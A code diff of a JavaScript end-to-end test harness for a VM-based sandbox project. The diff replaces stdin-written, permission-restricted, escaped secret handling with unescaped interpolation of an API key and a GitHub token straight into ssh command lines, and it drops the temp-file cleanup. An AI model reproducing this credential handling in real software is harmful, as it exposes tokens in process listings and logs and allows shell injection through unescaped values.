     `ssh -o StrictHostKeyChecking=no -o LogLevel=ERROR "${INSTANCE_NAME}" '${escaped}'`,
-    { encoding: "utf-8", timeout, stdio: ["pipe", "pipe", "pipe"] },
-  ).trim();
-}
-
-function shellEscape(value) {
-  return value.replace(/'/g, "'\\''");
+    { encoding: "utf-8", timeout, stdio },
+  );
+  return stream ? "" : result.trim();
 }
 
-/** Write secrets to a temp file on the remote VM (called once during setup). */
-let remoteSecretsFile = null;
-function setupRemoteSecrets() {
-  if (remoteSecretsFile) return;
-  remoteSecretsFile = "/tmp/.e2e-secrets";
-  const secretPreamble = [
-    `export NVIDIA_API_KEY='${shellEscape(process.env.NVIDIA_API_KEY)}'`,
-    `export GITHUB_TOKEN='${shellEscape(process.env.GITHUB_TOKEN)}'`,
+/** Run a command on the remote VM with env vars set for NemoClaw. */
+function sshEnv(cmd, { timeout = 600_000, stream = false } = {}) {
+  const envPrefix = [
+    `export NVIDIA_API_KEY='${process.env.NVIDIA_API_KEY}'`,
+    `export GITHUB_TOKEN='${process.env.GITHUB_TOKEN}'`,
     `export NEMOCLAW_NON_INTERACTIVE=1`,
     `export NEMOCLAW_SANDBOX_NAME=e2e-test`,
-  ].join("\n");
-
-  // Write secrets via stdin to avoid them appearing in command line
-  execSync(
-    `ssh -o StrictHostKeyChecking=no -o LogLevel=ERROR "${INSTANCE_NAME}" 'cat > ${remoteSecretsFile} && chmod 600 ${remoteSecretsFile}'`,
-    {
-      encoding: "utf-8",
-      timeout: 30_000,
-      input: secretPreamble,
-      stdio: ["pipe", "pipe", "pipe"],
-    },
-  );
-}
-
-/** Run a command on the remote VM with secrets sourced from temp file. */
-function sshWithSecrets(cmd, { timeout = 600_000, stream = false } = {}) {
-  setupRemoteSecrets();
-
-  // When stream=true, pipe stdout/stderr to the CI log in real time
-  // so long-running steps (bootstrap) show progress instead of silence.
-  /** @type {import("child_process").StdioOptions} */
-  const stdio = stream ? ["inherit", "inherit", "inherit"] : ["pipe", "pipe", "pipe"];
+  ].join(" && ");
 
-  const escaped = cmd.replace(/'/g, "'\\''");
-  const result = execSync(
-    `ssh -o StrictHostKeyChecking=no -o LogLevel=ERROR "${INSTANCE_NAME}" 'source ${remoteSecretsFile} && ${escaped}'`,
-    {
-      encoding: "utf-8",
-      timeout,
-      stdio,
-    },
-  );
-  return stream ? "" : result.trim();
+  return ssh(`${envPrefix} && ${cmd}`, { timeout, stream });
 }
 
 function waitForSsh(maxAttempts = 90, intervalMs = 5_000) {
@@ -131,7 +96,7 @@ function runRemoteTest(scriptPath) {
   ].join(" && ");
 
   // Stream test output to CI log AND capture it for assertions
-  sshWithSecrets(cmd, { timeout: 900_000, stream: true });
+  sshEnv(cmd, { timeout: 900_000, stream: true });
   // Retrieve the captured output for assertion checking
   return ssh("cat /tmp/test-output.log", { timeout: 30_000 });
 }
@@ -182,7 +147,7 @@ describe.runIf(hasRequiredVars)("Brev E2E", () => {
 
     // Bootstrap VM — stream output to CI log so we can see progress
     console.log(`[${elapsed()}] Running brev-setup.sh (bootstrap)...`);
-    sshWithSecrets(`cd ${remoteDir} && SKIP_VLLM=1 bash scripts/brev-setup.sh`, { timeout: 2_400_000, stream: true });
+    sshEnv(`cd ${remoteDir} && SKIP_VLLM=1 bash scripts/brev-setup.sh`, { timeout: 2_400_000, stream: true });
     console.log(`[${elapsed()}] Bootstrap complete`);
 
     // Install nemoclaw CLI — brev-setup.sh creates the sandbox but doesn't
@@ -235,16 +200,6 @@ REGISTRY`,
 
   afterAll(() => {
     if (!instanceCreated) return;
-
-    // Clean up secrets file
-    if (remoteSecretsFile) {
-      try {
-        ssh(`rm -f ${remoteSecretsFile}`, { timeout: 10_000 });
-      } catch {
-        // Best-effort cleanup
-      }
-    }
-
     if (process.env.KEEP_ALIVE === "true") {
       console.log(`\n  Instance "${INSTANCE_NAME}" kept alive for debugging.`);
       console.log(`  To connect: brev refresh && ssh ${INSTANCE_NAME}`);